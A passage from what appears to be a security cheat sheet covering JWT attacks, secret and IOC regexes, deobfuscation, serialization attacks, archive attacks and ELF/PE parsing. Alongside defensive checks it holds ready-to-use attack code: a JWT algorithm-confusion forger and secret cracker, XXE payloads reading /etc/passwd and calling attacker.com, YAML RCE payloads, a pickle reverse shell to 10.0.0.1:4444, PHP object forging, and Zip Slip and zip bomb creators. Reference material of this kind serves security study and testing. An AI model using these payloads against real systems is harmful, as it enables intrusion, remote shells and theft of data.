header = {"alg": "HS256", "typ": "JWT"}
def encode_part(data: dict) -> str:
return base64.urlsafe_b64encode(
json.dumps(data, separators=(',', ':')).encode()
).rstrip(b'=').decode()
header_b64 = encode_part(header)
payload_b64 = encode_part(payload)
signing_input = f"{header_b64}.{payload_b64}".encode()
signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()
return f"{header_b64}.{payload_b64}.{sig_b64}"
# Usage: obtain server's public key (often in /.well-known/jwks.json or /api/public-key)
# with open("public.pem", "rb") as f:
# forged = jwt_forge_hmac_rsa_confusion({"sub": "admin"}, f.read())
Crack JWT secret (HS256)
# Using hashcat
hashcat -m 16500 jwt.txt wordlist.txt
# Using john the ripper
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256
# Using jwt_tool (pip install jwt_tool)
python3 jwt_tool.py <token> -C -d wordlist.txt
import hmac
import hashlib
import base64
def jwt_crack(token: str, wordlist_path: str) -> str | None:
"""Brute-force HS256 JWT secret from a wordlist."""
parts = token.split('.')
signing_input = f"{parts[0]}.{parts[1]}".encode()
target_sig = base64.urlsafe_b64decode(parts[2] + '==')
with open(wordlist_path, 'r', errors='ignore') as f:
for line in f:
secret = line.strip()
computed = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
if hmac.compare_digest(computed, target_sig):
return secret
return None
JWT security checklist
| Attack | Condition | Mitigation |
|---|---|---|
| alg:none | Server accepts unsigned tokens | Reject none algorithm; whitelist allowed algorithms |
| HMAC/RSA confusion | Server accepts HS256 when configured for RS256 | Enforce algorithm in server config, not from token header |
| Weak secret | Short/guessable HMAC key | Use 256+ bit random secret |
| No expiry | Missing exp claim |
Always set and validate exp |
| kid injection | kid header used in SQL/file lookup |
Sanitize kid, use allowlist |
| jwk/jku injection | Server fetches attacker-controlled key | Whitelist key sources |
| Claim tampering | Only signature checked, not claims | Validate all security-relevant claims server-side |
10. Regular Expressions for Security
IPv4 / IPv6
import re
# IPv4 — strict
IPV4 = re.compile(
r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\b'
)
# IPv4 with CIDR
IPV4_CIDR = re.compile(
r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)(?:/\d{1,2})?\b'
)
# IPv6 — simplified (matches most common forms)
IPV6 = re.compile(r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'
r'|(?:[0-9a-fA-F]{1,4}:)*:(?::[0-9a-fA-F]{1,4})*')
# Private/RFC1918 ranges
PRIVATE_IPV4 = re.compile(
r'\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|'
r'172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|'
r'192\.168\.\d{1,3}\.\d{1,3})\b'
)
URLs
URL = re.compile(
r'https?://(?:[\w-]+\.)+[\w]{2,}' # scheme + domain
r'(?::\d{1,5})?' # optional port
r'(?:/[^\s\'"<>]*)?' # optional path
)
# Extract domain from URL
DOMAIN = re.compile(r'https?://([^/:]+)')
EMAIL = re.compile(
r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
)
Hashes (for IOC extraction)
MD5_RE = re.compile(r'\b[0-9a-fA-F]{32}\b')
SHA1_RE = re.compile(r'\b[0-9a-fA-F]{40}\b')
SHA256_RE = re.compile(r'\b[0-9a-fA-F]{64}\b')
SHA512_RE = re.compile(r'\b[0-9a-fA-F]{128}\b')
CVE IDs
CVE = re.compile(r'CVE-\d{4}-\d{4,}')
Credit card numbers (PCI DSS scanning)
# Visa
VISA = re.compile(r'\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')
# Mastercard
MC = re.compile(r'\b5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')
# AMEX
AMEX = re.compile(r'\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b')
# Generic (13-19 digits, optionally separated)
CC_GENERIC = re.compile(r'\b(?:\d[\s-]?){13,19}\b')
def luhn_check(number: str) -> bool:
"""Validate credit card number with Luhn algorithm."""
digits = [int(d) for d in number if d.isdigit()]
digits.reverse()
total = 0
for i, d in enumerate(digits):
if i % 2 == 1:
d *= 2
if d > 9:
d -= 9
total += d
return total % 10 == 0
SSN (US Social Security Number)
SSN = re.compile(r'\b\d{3}-\d{2}-\d{4}\b')
# Stricter (excludes known invalid ranges)
SSN_STRICT = re.compile(
r'\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b'
)
API keys and secrets
# AWS Access Key ID
AWS_KEY = re.compile(r'\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b')
# AWS Secret Access Key
AWS_SECRET = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')
# GitHub Personal Access Token
GITHUB_PAT = re.compile(r'\bghp_[A-Za-z0-9]{36}\b')
GITHUB_PAT_FINE = re.compile(r'\bgithub_pat_[A-Za-z0-9_]{82}\b')
# Slack Bot Token
SLACK_BOT = re.compile(r'\bxoxb-\d{10,13}-\d{10,13}-[a-zA-Z0-9]{24}\b')
# Slack Webhook
SLACK_WEBHOOK = re.compile(r'https://hooks\.slack\.com/services/T[A-Z0-9]{8}/B[A-Z0-9]{8}/[a-zA-Z0-9]{24}')
# Google API Key
GOOGLE_API = re.compile(r'\bAIza[0-9A-Za-z_-]{35}\b')
# Generic high-entropy string (potential secret)
import math
def entropy(s: str) -> float:
freq = {}
for c in s:
freq[c] = freq.get(c, 0) + 1
return -sum((f/len(s)) * math.log2(f/len(s)) for f in freq.values())
# Strings > 20 chars with entropy > 4.5 are suspicious
GENERIC_SECRET = re.compile(r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?', re.IGNORECASE)
# Private key markers
PRIVATE_KEY = re.compile(r'-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----')
# JWT pattern
JWT_RE = re.compile(r'\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b')
Combined IOC extractor
def extract_iocs(text: str) -> dict[str, list[str]]:
"""Extract all security-relevant indicators from text."""
return {
'ipv4': list(set(IPV4.findall(text))),
'email': list(set(EMAIL.findall(text))),
'url': list(set(URL.findall(text))),
'md5': list(set(MD5_RE.findall(text))),
'sha1': list(set(SHA1_RE.findall(text))),
'sha256': list(set(SHA256_RE.findall(text))),
'cve': list(set(CVE.findall(text))),
'aws_key': list(set(AWS_KEY.findall(text))),
'github_pat': list(set(GITHUB_PAT.findall(text))),
'jwt': list(set(JWT_RE.findall(text))),
'private_key': list(set(PRIVATE_KEY.findall(text))),
}
11. Obfuscation & Deobfuscation
JavaScript obfuscation patterns
# --- JSFuck (encode JS using only []()!+ ) ---
# '(' becomes: (![]+[])[+!+[]+!+[]+!+[]]
# Full charset available from 6 characters
# --- Hex escape obfuscation ---
# eval("\x61\x6c\x65\x72\x74\x28\x31\x29") -> eval("alert(1)")
# --- Unicode escape ---
# \u0061\u006c\u0065\u0072\u0074(1) -> alert(1)
# --- String.fromCharCode ---
# eval(String.fromCharCode(97,108,101,114,116,40,49,41)) -> eval("alert(1)")
# --- Deobfuscate String.fromCharCode ---
def deobfuscate_charcode(js: str) -> str:
"""Deobfuscate String.fromCharCode() calls."""
import re
pattern = r'String\.fromCharCode\(([\d,\s]+)\)'
def replace(m):
chars = [int(c.strip()) for c in m.group(1).split(',')]
return repr(''.join(chr(c) for c in chars))
return re.sub(pattern, replace, js)
# --- Deobfuscate hex/unicode escapes ---
def deobfuscate_js_escapes(js: str) -> str:
"""Resolve \\xNN and \\uNNNN escapes in JavaScript strings."""
import re
# \xNN
result = re.sub(r'\\x([0-9a-fA-F]{2})',
lambda m: chr(int(m.group(1), 16)), js)
# \uNNNN
result = re.sub(r'\\u([0-9a-fA-F]{4})',
lambda m: chr(int(m.group(1), 16)), result)
return result
# --- Deobfuscate atob() (base64 in JS) ---
# atob("YWxlcnQoMSk=") -> "alert(1)"
def deobfuscate_atob(js: str) -> str:
import re, base64
pattern = r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)'
def replace(m):
return repr(base64.b64decode(m.group(1)).decode())
return re.sub(pattern, replace, js)
PowerShell obfuscation patterns
# --- Encoded command ---
# powershell -enc <base64 of UTF-16LE>
import base64
def decode_ps_encoded_command(encoded: str) -> str:
return base64.b64decode(encoded).decode('utf-16-le')
# --- String concatenation ---
# 'Inv'+'oke'+'-Exp'+'ression' -> 'Invoke-Expression'
# --- Backtick escaping ---
# I`nv`oke-`Exp`ression -> Invoke-Expression
def deobfuscate_backticks(ps: str) -> str:
import re
# Remove backticks that escape normal characters (not special ones)
return re.sub(r'`([^0abfnrtv])', r'\1', ps)
# --- -replace with char codes ---
# [char]73 + [char]69 + [char]88 -> 'IEX'
def deobfuscate_char_cast(ps: str) -> str:
import re
def replace(m):
return chr(int(m.group(1)))
return re.sub(r'\[char\]\s*(\d+)', replace, ps, flags=re.IGNORECASE)
# --- Environment variable concatenation ---
# $env:comspec[4,15,25]-join'' -> 'IEX' (extracting chars from 'C:\WINDOWS\system32\cmd.exe')
# --- Compressed / deflate streams ---
# IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(
# [IO.MemoryStream][Convert]::FromBase64String('...'),
# [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()
def decode_ps_deflate(b64_data: str) -> str:
import base64, zlib
compressed = base64.b64decode(b64_data)
# PowerShell uses raw deflate (no zlib header), wbits=-15
return zlib.decompress(compressed, -15).decode('utf-8', errors='replace')
# --- Combined deobfuscation pipeline ---
def deobfuscate_powershell(script: str) -> str:
script = deobfuscate_backticks(script)
script = deobfuscate_char_cast(script)
# Remove common no-op patterns
script = script.replace("( ", "(").replace(" )", ")")
return script
Python obfuscation patterns
# --- exec(compile()) ---
# exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))
# --- Lambda chains ---
# (lambda: (lambda f: f(f))(lambda f: print("hello")))()
# --- Marshal/bytecode ---
import marshal, types
code = compile("print('hello')", "<string>", "exec")
serialized = marshal.dumps(code)
# Reconstruct: exec(marshal.loads(serialized))
# --- Deobfuscation: extract strings from exec/eval ---
def safe_deobfuscate_exec(code: str) -> str:
"""Replace exec/eval with print to see what would execute."""
import re
code = re.sub(r'\bexec\s*\(', 'print(', code)
code = re.sub(r'\beval\s*\(', 'print(', code)
return code
# WARNING: Only run deobfuscated code in a sandbox/VM
PHP obfuscation patterns
// Common patterns in webshells:
// eval(base64_decode('...'))
// eval(gzinflate(base64_decode('...')))
// eval(str_rot13('...'))
// preg_replace('/.*/e', base64_decode('...'), '') // /e modifier = eval (PHP < 7)
// assert(base64_decode('...')) // acts like eval
// create_function('', base64_decode('...')) // anonymous eval
// Variable function calls (hiding function names):
// $f = 'sys'.'tem'; $f('whoami');
// $_GET['cmd']($_GET['arg']); // webshell one-liner
// chr() obfuscation:
// $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $f('id');
# Deobfuscate PHP eval(base64_decode(...))
import re
import base64
def deobfuscate_php_b64(php_code: str) -> str:
pattern = r'(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
def replace(m):
decoded = base64.b64decode(m.group(1)).decode('utf-8', errors='replace')
return f'/* DECODED: */ {decoded}'
return re.sub(pattern, replace, php_code)
# Deobfuscate PHP chr() chains
def deobfuscate_php_chr(php_code: str) -> str:
pattern = r'chr\((\d+)\)'
parts = re.split(r'(chr\(\d+\))', php_code)
result = []
for part in parts:
m = re.match(r'chr\((\d+)\)', part)
if m:
result.append(chr(int(m.group(1))))
else:
result.append(part.replace('.', ''))
return ''.join(result)
12. Serialization Security
JSON
import json
# Standard encode/decode
data = {"user": "admin", "role": "user"}
encoded = json.dumps(data)
decoded = json.loads(encoded)
# Security: JSON injection via key/value manipulation
# If user controls a JSON key or value without escaping:
# {"user": "admin", "role": "user"} could become
# {"user": "admin", "role": "admin"} via parameter pollution
# JSON comment stripping (some parsers accept comments)
# {"key": "value" /* comment */} -> invalid JSON but some libs accept it
# Large number handling (precision loss)
# JavaScript: JSON.parse('{"id": 9999999999999999}') -> 10000000000000000
# Python handles arbitrary precision; JS does not
# Duplicate key behavior (parser-dependent)
json.loads('{"a": 1, "a": 2}') # Python: {'a': 2} (last wins)
# Other parsers may take first, error, or behave inconsistently
# Exploitation: WAF parses first key, backend parses last key
XML (XXE, XSS, billion laughs)
# --- DANGEROUS: Default XML parsing allows XXE ---
# NEVER use xml.etree.ElementTree with untrusted input without disabling entities
# XXE payload examples:
xxe_file_read = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""
xxe_ssrf = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>"""
xxe_oob = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>&send;</root>"""
# Billion Laughs (XML bomb) — exponential entity expansion
xml_bomb = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<root>&lol9;</root>"""
# 3 bytes "lol" expands to ~3 GB
# SAFE XML parsing in Python
import defusedxml.ElementTree as ET # pip install defusedxml
# or with stdlib:
from xml.etree.ElementTree import XMLParser
# Disable entities manually — defusedxml is strongly preferred
YAML (arbitrary code execution)
import yaml
# DANGEROUS: yaml.load() with default Loader executes arbitrary Python
dangerous_yaml = """
!!python/object/apply:os.system
args: ['id']
"""
# yaml.load(dangerous_yaml, Loader=yaml.UnsafeLoader) # EXECUTES 'id'
# SAFE: Always use SafeLoader
safe = yaml.safe_load("key: value")
# Exploit payloads:
yaml_rce_payloads = [
"!!python/object/apply:os.system ['whoami']",
"!!python/object/apply:subprocess.check_output [['id']]",
"!!python/object/new:os.system ['curl http://attacker.com']",
"!!python/object/apply:builtins.eval ['__import__(\"os\").system(\"id\")']",
]
# Ruby YAML (Psych) RCE:
# --- !!ruby/object:Gem::Installer
# --- i: x
# --- !!ruby/object:Gem::SpecFetcher
# --- i: y
# --- !!ruby/object:Gem::Requirement
# --- requirements:
# --- !!ruby/object:Gem::Package::TarReader
# --- io: &1 !!ruby/object:Net::BufferedIO
# --- io: &1 !!ruby/object:Gem::Package::TarReader::Entry
# --- read: 0
# --- header: "abc"
# --- debug_output: &1 !!ruby/object:Net::WriteAdapter
# --- socket: &1 !!ruby/object:Gem::RequestSet
# --- sets: !!ruby/object:Net::WriteAdapter
# --- socket: !ruby/module 'Kernel'
# --- method_id: :system
# --- git_set: id
# --- method_id: :resolve
Python pickle (arbitrary code execution)
import pickle
import os
# NEVER unpickle untrusted data — equivalent to eval()
# RCE via pickle:
class Exploit:
def __reduce__(self):
return (os.system, ('id',))
payload = pickle.dumps(Exploit())
print(payload)
# Unpickling this runs 'id'
# More sophisticated: reverse shell via pickle
class ReverseShell:
def __reduce__(self):
import subprocess
return (subprocess.Popen, (
['bash', '-c', 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'],
))
# Detection: look for these opcodes in pickle data
# \x80 = PROTO
# c = GLOBAL (c__builtin__\neval\n -> dangerous)
# R = REDUCE (calls the callable)
# ( = MARK
def is_pickle_dangerous(data: bytes) -> bool:
"""Heuristic check for dangerous pickle opcodes."""
dangerous_modules = [b'os', b'subprocess', b'builtins', b'nt',
b'posix', b'commands', b'sys', b'importlib']
for mod in dangerous_modules:
if mod in data:
return True
return False
# Safe alternative: use json, msgpack, or protobuf
# If pickle is required, use hmac to sign before unpickling:
import hmac, hashlib
def safe_pickle_dump(obj, key: bytes) -> tuple[bytes, bytes]:
data = pickle.dumps(obj)
sig = hmac.new(key, data, hashlib.sha256).digest()
return data, sig
def safe_pickle_load(data: bytes, sig: bytes, key: bytes):
expected = hmac.new(key, data, hashlib.sha256).digest()
if not hmac.compare_digest(sig, expected):
raise ValueError("Pickle signature verification failed")
return pickle.loads(data)
PHP serialize/unserialize
# PHP serialization format:
# s:5:"hello"; -> string(5) "hello"
# i:42; -> int 42
# b:1; -> bool true
# a:2:{s:1:"a";i:1;s:1:"b";i:2;} -> array("a"=>1, "b"=>2)
# O:4:"User":1:{s:4:"name";s:5:"admin";} -> User object
# PHP Object Injection: if unserialize() is called on user input,
# attacker can instantiate arbitrary classes and trigger __wakeup(),
# __destruct(), __toString() magic methods
# Python tool to craft PHP serialized payloads:
def php_serialize_string(s: str) -> str:
return f's:{len(s)}:"{s}";'
def php_serialize_object(class_name: str, properties: dict) -> str:
props = ''
for key, value in properties.items():
props += php_serialize_string(key)
if isinstance(value, str):
props += php_serialize_string(value)
elif isinstance(value, int):
props += f'i:{value};'
return f'O:{len(class_name)}:"{class_name}":{len(properties)}:{{{props}}}'
# Forge admin object
payload = php_serialize_object("User", {"role": "admin", "id": 1})
# O:4:"User":2:{s:4:"role";s:5:"admin";s:2:"id";i:1;}
# Type juggling via loose comparison:
# "0e12345" == "0e99999" is TRUE in PHP (both are 0 in scientific notation)
# Exploit: find MD5 hash starting with "0e" followed by only digits
# MD5("240610708") = "0e462097431906509019562988736854" -> equals "0" in loose comparison
13. Compression Security
gzip analysis
import gzip
import struct
# Compress / decompress
data = b"A" * 10000
compressed = gzip.compress(data)
decompressed = gzip.decompress(compressed)
# Parse gzip header (RFC 1952)
def parse_gzip_header(data: bytes) -> dict:
if data[:2] != b'\x1f\x8b':
raise ValueError("Not a gzip file")
method = data[2] # 8 = deflate
flags = data[3]
mtime = struct.unpack('<I', data[4:8])[0]
return {
'magic': data[:2].hex(),
'method': 'deflate' if method == 8 else f'unknown({method})',
'flags': f'{flags:08b}',
'ftext': bool(flags & 1),
'fhcrc': bool(flags & 2),
'fextra': bool(flags & 4),
'fname': bool(flags & 8),
'fcomment': bool(flags & 16),
'mtime': mtime,
}
# Analyze gzip file
file suspicious.gz
gzip -l suspicious.gz # list compression ratio
gzip -d -c suspicious.gz # decompress to stdout
zcat suspicious.gz # same as above
# Detect gzip by magic bytes
xxd suspicious.bin | head -1 # look for 1f8b
ZIP analysis and attacks
import zipfile
import os
# List contents
with zipfile.ZipFile('archive.zip', 'r') as zf:
for info in zf.infolist():
print(f"{info.filename:40} {info.file_size:>10} -> {info.compress_size:>10} "
f"{'encrypted' if info.flag_bits & 0x1 else ''}")
# --- ZIP path traversal (Zip Slip) ---
# Malicious zip contains: ../../etc/cron.d/evil
# When extracted naively, writes outside target directory
def safe_extract(zip_path: str, dest: str) -> None:
"""Extract ZIP safely, preventing path traversal."""
dest = os.path.realpath(dest)
with zipfile.ZipFile(zip_path, 'r') as zf:
for member in zf.infolist():
member_path = os.path.realpath(os.path.join(dest, member.filename))
if not member_path.startswith(dest + os.sep) and member_path != dest:
raise ValueError(f"Path traversal detected: {member.filename}")
zf.extract(member, dest)
# --- Detect path traversal in ZIP ---
def check_zip_traversal(zip_path: str) -> list[str]:
dangerous = []
with zipfile.ZipFile(zip_path, 'r') as zf:
for name in zf.namelist():
if name.startswith('/') or '..' in name:
dangerous.append(name)
return dangerous
# --- Create Zip Slip payload ---
def create_zip_slip(output: str, target_path: str, content: bytes) -> None:
"""Create a ZIP with path traversal payload. Authorized testing only."""
with zipfile.ZipFile(output, 'w') as zf:
zf.writestr(target_path, content)
# create_zip_slip('evil.zip', '../../../../tmp/evil.sh', b'#!/bin/bash\nid > /tmp/pwned\n')
ZIP bomb (decompression bomb)
# --- Nested ZIP bomb ---
# 42.zip: 42KB compressed -> 4.5 PB decompressed (nested ZIPs)
# Single-layer bomb:
def detect_zip_bomb(zip_path: str, ratio_threshold: int = 100,
size_threshold: int = 1_000_000_000) -> bool:
"""Detect potential ZIP bomb by compression ratio."""
with zipfile.ZipFile(zip_path, 'r') as zf:
for info in zf.infolist():
if info.compress_size > 0:
ratio = info.file_size / info.compress_size
if ratio > ratio_threshold or info.file_size > size_threshold:
return True
elif info.file_size > 0:
return True # zero compressed size but non-zero file size
return False
# Create a simple zip bomb (for testing decompression limits)
def create_zip_bomb(output: str, uncompressed_size: int = 10_000_000) -> None:
"""Create a single-layer zip bomb. Testing only."""
with zipfile.ZipFile(output, 'w', zipfile.ZIP_DEFLATED) as zf:
# Highly compressible data
zf.writestr('bomb.txt', b'\x00' * uncompressed_size)
tar analysis and attacks
# List tar contents (check for path traversal)
tar -tvf archive.tar | grep -E '^\.\./|^/'
# Safe extraction (GNU tar strips leading / by default)
tar --no-same-owner --no-same-permissions -xvf archive.tar -C /tmp/safe/
# Check for symlink attacks
tar -tvf archive.tar | grep '^l'
import tarfile
# Detect dangerous tar entries
def check_tar_safety(tar_path: str) -> list[str]:
issues = []
with tarfile.open(tar_path) as tf:
for member in tf.getmembers():
# Path traversal
if member.name.startswith('/') or '..' in member.name:
issues.append(f"PATH_TRAVERSAL: {member.name}")
# Symlink outside extraction directory
if member.issym() or member.islnk():
issues.append(f"SYMLINK: {member.name} -> {member.linkname}")
# Setuid/setgid bits
if member.mode & 0o4000 or member.mode & 0o2000:
issues.append(f"SETUID/SETGID: {member.name} mode={oct(member.mode)}")
# Device files
if member.isdev():
issues.append(f"DEVICE_FILE: {member.name}")
return issues
# Safe extraction (Python 3.12+ has filter parameter)
# tarfile.open(path).extractall(dest, filter='data') # Python 3.12+
14. Binary & Struct Manipulation
struct packing and unpacking
import struct
# Format characters:
# < little-endian > big-endian ! network (big-endian) = native
# b/B signed/unsigned byte (1)
# h/H signed/unsigned short (2)
# i/I signed/unsigned int (4)
# l/L signed/unsigned long (4)
# q/Q signed/unsigned long long (8)
# f float (4) d double (8)
# s char[] (bytes) p pascal string
# x padding byte
# Pack values into binary
packed = struct.pack('<IHH', 0xdeadbeef, 0x1234, 0x5678)
print(packed.hex()) # efbeadde34127856 (little-endian)
# Unpack binary to values
values = struct.unpack('<IHH', packed)
print([hex(v) for v in values]) # ['0xdeadbeef', '0x1234', '0x5678']
# Network byte order (big-endian) for IP/TCP
import socket
ip_packed = socket.inet_aton("192.168.1.1") # b'\xc0\xa8\x01\x01'
ip_int = struct.unpack('!I', ip_packed)[0] # 3232235777
ip_str = socket.inet_ntoa(struct.pack('!I', ip_int)) # '192.168.1.1'
# Pack a C struct
# struct header { uint32_t magic; uint16_t version; uint16_t flags; uint32_t size; };
header = struct.pack('<IHHI', 0x7f454c46, 2, 1, 0x1000)
# Unpack with named fields (using namedtuple)
from collections import namedtuple
Header = namedtuple('Header', 'magic version flags size')
parsed = Header._make(struct.unpack('<IHHI', header))
print(f"Magic: {parsed.magic:#x}, Version: {parsed.version}")
Endianness
# Little-endian: least significant byte first (x86, ARM default)
# Big-endian: most significant byte first (network order, MIPS, SPARC)
value = 0xdeadbeef
# Manual conversion
le_bytes = value.to_bytes(4, 'little') # b'\xef\xbe\xad\xde'
be_bytes = value.to_bytes(4, 'big') # b'\xde\xad\xbe\xef'
# Swap endianness
def swap_endian_32(val: int) -> int:
return struct.unpack('<I', struct.pack('>I', val))[0]
def swap_endian_16(val: int) -> int:
return struct.unpack('<H', struct.pack('>H', val))[0]
# Detect endianness of a binary
def detect_endianness(data: bytes, offset: int, expected: int) -> str:
"""Check if value at offset matches expected in LE or BE."""
le_val = struct.unpack_from('<I', data, offset)[0]
be_val = struct.unpack_from('>I', data, offset)[0]
if le_val == expected:
return 'little-endian'
elif be_val == expected:
return 'big-endian'
return 'unknown'
# Python int methods
val = int.from_bytes(b'\xef\xbe\xad\xde', 'little') # 0xdeadbeef
val = int.from_bytes(b'\xde\xad\xbe\xef', 'big') # 0xdeadbeef
ELF header parsing
import struct
from collections import namedtuple
def parse_elf_header(data: bytes) -> dict:
"""Parse ELF file header."""
if data[:4] != b'\x7fELF':
raise ValueError("Not an ELF file")
ei_class = data[4] # 1=32-bit, 2=64-bit
ei_data = data[5] # 1=LE, 2=BE
ei_version = data[6] # 1=current
ei_osabi = data[7] # 0=SYSV, 3=Linux, etc.
endian = '<' if ei_data == 1 else '>'
bits = 32 if ei_class == 1 else 64
if bits == 64:
# e_type(2) e_machine(2) e_version(4) e_entry(8) e_phoff(8) e_shoff(8)
# e_flags(4) e_ehsize(2) e_phentsize(2) e_phnum(2) e_shentsize(2)
# e_shnum(2) e_shstrndx(2)
fmt = f'{endian}HHIQQQIHHHHHH'
fields = struct.unpack_from(fmt, data, 16)
e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
else:
fmt = f'{endian}HHIIIIIHHHHHH'
fields = struct.unpack_from(fmt, data, 16)
e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
ELF_TYPES = {0: 'ET_NONE', 1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
MACHINES = {0x3: 'x86', 0x3E: 'x86_64', 0x28: 'ARM', 0xB7: 'AArch64',
0x08: 'MIPS', 0xF3: 'RISC-V'}
return {
'class': f'{bits}-bit',
'endian': 'little' if ei_data == 1 else 'big',
'type': ELF_TYPES.get(e_type, f'0x{e_type:x}'),
'machine': MACHINES.get(e_machine, f'0x{e_machine:x}'),
'entry_point': f'0x{e_entry:x}',
'ph_offset': e_phoff,
'ph_count': e_phnum,
'sh_offset': e_shoff,
'sh_count': e_shnum,
}
# Usage:
# with open('/bin/ls', 'rb') as f:
# info = parse_elf_header(f.read(64))
# for k, v in info.items():
# print(f"{k}: {v}")
# Quick ELF analysis
readelf -h /bin/ls # full header
readelf -l /bin/ls # program headers (segments)
readelf -S /bin/ls # section headers
readelf -d /bin/ls # dynamic section (libraries)
readelf -s /bin/ls # symbol table
objdump -d /bin/ls | head -50 # disassembly
# Check for security features
checksec --file=/bin/ls # RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH
PE header parsing
import struct
def parse_pe_header(data: bytes) -> dict:
"""Parse PE (Windows executable) header."""
if data[:2] != b'MZ':
raise ValueError("Not a PE file")
# e_lfanew: offset to PE signature (at offset 0x3C)
pe_offset = struct.unpack_from('<I', data, 0x3C)[0]
if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
raise ValueError("Invalid PE signature")
# COFF header (20 bytes after PE signature)
coff_offset = pe_offset + 4
machine, num_sections, timestamp, sym_table, num_symbols, \
opt_header_size, characteristics = struct.unpack_from('<HHIIIHH', data, coff_offset)
MACHINES = {0x14c: 'x86', 0x8664: 'x86_64', 0xAA64: 'ARM64'}
# Optional header magic
opt_offset = coff_offset + 20
opt_magic = struct.unpack_from('<H', data, opt_offset)[0]
pe_type = 'PE32+' if opt_magic == 0x20b else 'PE32'
# Entry point and image base
if pe_type == 'PE32+':
entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
image_base = struct.unpack_from('<Q', data, opt_offset + 24)[0]
else:
entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
image_base = struct.unpack_from('<I', data, opt_offset + 28)[0]
import datetime
try:
compile_time = datetime.datetime.utcfromtimestamp(timestamp).isoformat()
except (OSError, ValueError):
compile_time = f"raw: {timestamp}"
return {
'type': pe_type,
'machine': MACHINES.get(machine, f'0x{machine:x}'),
'sections': num_sections,
'compile_time': compile_time,
'entry_point_rva': f'0x{entry_rva:x}',
'image_base': f'0x{image_base:x}',
'characteristics': f'0x{characteristics:x}',
'is_dll': bool(characteristics & 0x2000),
'is_exe': bool(characteristics & 0x0002),
}
# Usage:
# with open('malware.exe', 'rb') as f:
# info = parse_pe_header(f.read(1024))
Shellcode extraction and analysis
# Extract shellcode from various formats
def shellcode_from_c_array(c_code: str) -> bytes:
"""Parse C-style shellcode: unsigned char buf[] = {0x6a,...};"""
import re
hex_vals = re.findall(r'0x([0-9a-fA-F]{1,2})', c_code)
return bytes(int(h, 16) for h in hex_vals)
def shellcode_from_escaped(escaped: str) -> bytes:
"""Parse \\x escape format: \\x6a\\x02\\x58"""
import re
hex_vals = re.findall(r'\\x([0-9a-fA-F]{2})', escaped)
return bytes(int(h, 16) for h in hex_vals)
def shellcode_to_c_array(data: bytes, var_name: str = "buf") -> str:
